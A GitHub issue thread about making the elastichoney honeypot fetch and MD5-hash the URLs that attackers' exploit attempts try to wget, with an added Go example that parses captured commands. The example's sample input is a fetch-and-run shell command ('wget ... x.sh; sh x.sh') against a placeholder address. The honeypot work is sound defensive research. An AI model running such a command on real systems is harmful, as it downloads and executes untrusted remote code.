
Explicitly fetch http payloads for analysis

Open jatrost opened this issue 10 years ago • 5 comments

Many of the exploit attempts cause ES to attempt to wget a URL. This URL should be fetched, md5'ed, and ideally included in the payload for analysis. Maybe this should be configurable.

jatrost avatar Apr 27 '15 20:04 jatrost

I've thought about this exact thing. Kippo does this quite well. My only concern would be how to parse the wget command sent to the honeypot.

jordan-wright avatar Apr 29 '15 01:04 jordan-wright

This is how we do it for shockpot: https://github.com/threatstream/shockpot/blob/master/commands.py. We just grabbed a bunch of example exploit attempts and made sure that we covered most of them. The bad guys will be able to evade but I haven't seen many examples of this in the wild.

jatrost avatar Apr 30 '15 10:04 jatrost
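The fetch-and-hash step discussed above, as an added example in Go (elastichoney's language); it is not code from elastichoney, shockpot or the linked PR, and the regex, the function names and the constructed `203.0.113.9` command are assumptions. It pulls the wget/curl URL out of a captured command, then reads a bounded number of bytes and MD5s them.

```go
package main

import (
	"crypto/md5"
	"encoding/hex"
	"fmt"
	"io"
	"net/http"
	"regexp"
)

// downloadRE finds the URL argument of a wget or curl call in a captured shell
// command; flags may sit between command and URL, and ';', '&' or '|' end the
// call. Like shockpot's commands.py it is tuned to observed samples, not a shell parser.
var downloadRE = regexp.MustCompile(`(?i)\b(?:wget|curl)\b[^;&|]*?(https?://[^\s'";&|)]+)`)

// ExtractURLs returns the distinct download URLs in order of first appearance.
func ExtractURLs(cmd string) []string {
	seen := map[string]bool{}
	var out []string
	for _, m := range downloadRE.FindAllStringSubmatch(cmd, -1) {
		if u := m[1]; !seen[u] {
			seen[u] = true
			out = append(out, u)
		}
	}
	return out
}

// FetchMD5 reads at most maxBytes from url via client and returns the hex MD5
// and byte count; the cap stops a hostile server from exhausting honeypot memory.
func FetchMD5(client *http.Client, url string, maxBytes int64) (string, int64, error) {
	resp, err := client.Get(url)
	if err != nil {
		return "", 0, err
	}
	defer resp.Body.Close()
	h := md5.New()
	n, err := io.Copy(h, io.LimitReader(resp.Body, maxBytes))
	return hex.EncodeToString(h.Sum(nil)), n, err
}

func main() {
	// Constructed sample of a captured command; 203.0.113.9 is a documentation address.
	for _, u := range ExtractURLs("cd /tmp; wget -q http://203.0.113.9/x.sh -O x.sh; sh x.sh") {
		sum, n, err := FetchMD5(http.DefaultClient, u, 1<<20)
		fmt.Println(u, sum, n, err)
	}
}
```

Offline the sample URL is unreachable, so main prints the fetch error; pointing the client at a local test server shows the hash path.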

Opened a PR to address this enhancement https://github.com/jordan-wright/elastichoney/pull/6

cloughrm avatar May 07 '15 22:05 cloughrm

Thanks for this everyone! Let me review the PR and I'll see what I can do to merge. My biggest holdup is reviewing exactly what's going on with the parsing to make sure there isn't a way to exploit the honeypot.

Give me a week or so and bug me if I haven't merged by then :smile:

Thanks again!

jordan-wright avatar May 08 '15 03:05 jordan-wright

Thanks @jordan-wright - I have one more commit coming shortly to address handling form-encoded vs JSON-encoded POST requests.

cloughrm avatar May 08 '15 15:05 cloughrm